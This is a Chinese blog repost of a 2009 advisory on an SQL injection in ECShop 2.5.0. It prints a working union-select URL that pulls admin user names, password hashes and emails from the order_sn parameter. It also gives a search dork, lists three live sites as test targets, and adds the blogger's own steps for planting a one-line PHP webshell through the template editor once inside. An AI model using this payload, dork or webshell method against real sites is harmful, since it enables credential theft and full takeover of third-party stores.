首页 > 未分类 > ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability

ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability

Oct 28th,2009 发表评论

# 😆 Ti:有同学说这个很老了,去年十月国内就有人发过了,看了下,的确是,地址在这里。虽然是老的,但是以前没发过,所以也就不删了,留在这里存档吧。

PS:进去后 在“模板管理”-》“库项目管理”,然后选择myship.lbi,在模板里面随便插入一句话小马,在连接http://www.target.com/myship.php文件就可以了,ECshop的smarty模板机制是允许直接执行php代码。

######################### Securitylab.ir ########################
# Application Info:
# Name: ECSHOP
# Version: 2.5.0
# Website: http://www.ecshop.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################

# Vulnerability Info:
# Type: Sql Injection
# Risk: High
# Dork: “Powered by ECShop v2.5.0”
#===========================================================
# http://site.com/user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
#===========================================================
#################################################################
# For test:
# http://www.lobang99.com/store
# http://www.amteore.com
# http://www.vostart.com/web/eng
#################################################################
# Securitylab Security Research Team
###################################################################

声明: 本文采用 BY-NC-SA 协议进行授权. 转载请注明转自: ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability
  1. 灵懿 | 2009年11月17日08:51 | #1

    shop.fzxyw.cn
    福州大学城用ECmall搭建的网络交易平台
    有意的话,欢迎加入我们工作室一起交流~
    QQ:162053702

  1. 本文目前尚无任何 trackbacks 和 pingbacks.